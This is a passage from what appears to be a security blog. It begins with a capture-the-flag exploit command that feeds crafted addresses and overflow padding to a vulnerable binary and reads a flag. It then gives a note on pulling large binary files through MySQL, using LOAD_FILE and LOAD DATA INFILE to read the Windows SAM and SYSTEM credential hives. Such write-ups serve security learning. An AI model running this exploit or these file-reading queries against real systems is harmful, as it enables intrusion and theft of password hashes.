$ /home/vuln1/vuln300 -us0m3b0dy:15n0b0dyAA `perl -e 'print "-p","\xc4\xa0\x04\x08","\x18\x84\x04\x08","\x5c\x66\xfb\xf7","\x58\x9b\xa9\xaa","\xc4\xa0\x04\x08","\x59\x85\x04\x08","\xd5\x88\x04\x08","\x24\x8a\x04\x08"'` -fa `perl -e 'print "-x","A"x510'` `perl -e 'print "-yAAAA","\xb4\xa0\x04\x08","\x1a\x84\x04\x08"'`
...
$ cat flag.txt
33f9876804c9a14e927e5d1d70a64ace

Wednesday, January 19, 2011

Get binary file via MySQL

Just a note on getting a binary file via MySQL, because I just had to do it and could not find a method on the internet (with Google).

If the binary file is small, the easy way is to use LOAD_FILE(). For example,

SELECT HEX(LOAD_FILE('c:/windows/repair/sam'));

But if the binary file is big, MySQL throws the warning "Result of load_file() was larger than max_allowed_packet (1048576) - truncated" and returns NULL.

Someone on the MySQL forum suggested running "SET SESSION max_allowed_packet=16*1024*1024;" before using LOAD_FILE(). But it did not work for me. :(

After reading the MySQL docs, I found a way to do it with "LOAD DATA INFILE". This command needs a table to hold the data. Here are my SQL commands to load a binary file into a table.

use test;
CREATE TABLE files (bin_data longblob);
LOAD DATA INFILE 'c:/windows/repair/system' INTO TABLE files FIELDS TERMINATED BY 'AAAAAAAAAAA' ESCAPED BY '' LINES TERMINATED BY 'BBBBBBBBBBBBBBBB';

After these commands, the binary data will be in the "files" table without modification. :)

A note about the "FIELDS TERMINATED BY" and "LINES TERMINATED BY" values: they can be any string patterns that do not exist in the binary file.
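If you happen to have a local copy of a similar file, a few lines of Python can check candidate patterns before you use them. This is only a sketch with a made-up helper name. It assumes you can read representative bytes locally, which is often not the case for the remote file itself.

```python
def pick_terminators(data, count=2, length=16):
    """Return `count` distinct repeated-letter patterns that do not occur in data."""
    found = []
    for byte in range(ord("A"), ord("Z") + 1):
        candidate = bytes([byte]) * length
        if candidate not in data:
            found.append(candidate.decode("ascii"))
            if len(found) == count:
                return found
    raise ValueError("no safe pattern found, try a different length")

# Example with in-memory bytes instead of a real file.
sample = b"\x00\x01" + b"A" * 16 + b"\xff\xfe"
fields_term, lines_term = pick_terminators(sample)
print(fields_term, lines_term)
```

Here the "A" pattern is rejected because it occurs in the sample, so the helper falls through to the next letters.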